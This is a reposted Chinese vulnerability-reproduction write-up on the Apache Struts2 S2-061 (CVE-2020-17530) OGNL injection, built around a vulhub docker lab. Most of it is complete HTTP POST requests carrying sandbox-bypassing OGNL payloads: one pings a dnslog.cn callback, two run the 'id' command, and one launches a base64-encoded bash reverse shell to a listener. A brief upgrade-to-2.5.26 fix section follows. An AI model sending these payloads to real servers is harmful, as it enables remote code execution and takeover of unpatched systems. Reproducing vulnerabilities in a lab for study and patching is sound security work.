碼上歡樂
相關內容    簡體    繁體

Struts2 S2-061(CVE-2020-17530)漏洞復現

本文轉載自   查看原文   2020-12-11 20:21   7042    漏洞復現

 

0x00 漏洞簡介

Apache Struts2框架是一個用於開發Java EE網絡應用程序的Web框架。Apache Struts於2020年12月08日披露 S2-061 Struts 遠程代碼執行漏洞(CVE-2020-17530),在使用某些tag等情況下可能存在OGNL表達式注入漏洞,從而造成遠程代碼執行,風險極大。

0x01 漏洞描述

Struts2 會對某些標簽屬性(比如 `id`,其他屬性有待尋找) 的屬性值進行二次表達式解析,因此當這些標簽屬性中使用了 `%{x}` 且 `x` 的值用戶可控時,用戶再傳入一個 `%{payload}` 即可造成OGNL表達式執行。S2-061是對S2-059沙盒進行的繞過。

0x02 漏洞影響

struts 2.0.0 - struts 2.5.25

0x03 漏洞復現

一.環境搭建
1.docker環境地址:
https://github.com/vulhub/vulhub/tree/master/struts2/s2-061
docker-compose up -d  #啟動docker環境 
2.訪問目標地址
http://192.168.1.14:8080/index.action
   
   
   
           

    
    
    
            
   
   
   
           

   
   
   
           

    
    
    
            二、漏洞利用
   
   
   
           
1.DNSlog驗證漏洞
POST /index.action HTTP/1.1
Host: 192.168.1.14:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 853


------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"


%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("ping    paqmgs.dnslog.cn")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
DNGlog記錄可發現命令成功執行

2.通過構造post包執行exp 命令執行id
POST /index.action HTTP/1.1
Host: 192.168.1.14:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 827

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("id")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
burp提交后,在響應頁面發現命令回顯可,說明ID命令執行成功
或者
POST /index.action HTTP/1.1
Host: 192.168.1.14:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 1361

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{
(#request.map=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + 
(#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + 
(#request.map2=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) +
(#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + 
(#request.map3=#application.get('org.apache.tomcat.InstanceManager').newInstance('org.apache.commons.collections.BeanMap')).toString().substring(0,0) + 
(#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) + 
(#request.get('map3').put('excludedPackageNames',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet')) == true).toString().substring(0,0) + 
(#request.get('map3').put('excludedClasses',#application.get('org.apache.tomcat.InstanceManager').newInstance('java.util.HashSet')) == true).toString().substring(0,0) +
(#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'id'}))
}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

3.反彈shell命令
通過以下在線地址將bash反彈命令進行進行編碼轉換
http://www.jackson-t.ca/runtime-exec-payloads.html
提交以下poc:
POST /index.action HTTP/1.1
Host: 192.168.1.14:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 922

------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTQvMjIyMiAgIDA+JjE=}|{base64,-d}|{bash,-i}")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--
可以看到成功反彈shell:

0x04 漏洞修復

避免對不受信任的用戶輸入使用強制OGNL評估,或/和升級到2.5.26版,可修復該漏洞。騰訊安全專家建議受影響的用戶將Apache Struts框架升級至最新版本
臨時修復,升級到 Struts 2.5.26 版本,下載地址為:
https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.26

0x05  漏洞總結

此次漏洞只是 S2-059 修復的一個繞過,並且本次利用的核心類 org.apache.commons.collections.BeanMap commons-collections-x.x.jar 包中,但是在官方的最小依賴包中並沒有包含這個包。所以即使掃到了支持OGNL表達式的注入點,但是如果沒有使用這個依賴包,也還是沒辦法進行利用。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Struts2 s2-061 Poc分析 Apache struts2 namespace遠程命令執行_CVE-2018-11776(S2-057)漏洞復現 Apache struts2 Freemarker標簽遠程命令執行_CVE-2017-12611(S2-053)漏洞復現 struts2(s2-052)遠程命令執行漏洞復現 Apache Struts2遠程代碼執行漏洞(S2-015)復現及修復方案 struts2的(S2-045,CVE-2017-5638)漏洞測試筆記 CVE-2020-15778漏洞復現 CVE-2020-2555漏洞復現&&流量分析 CVE-2020-2883漏洞復現&&流量分析 CVE-2020-14750 WebLogic權限繞過漏洞復現
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM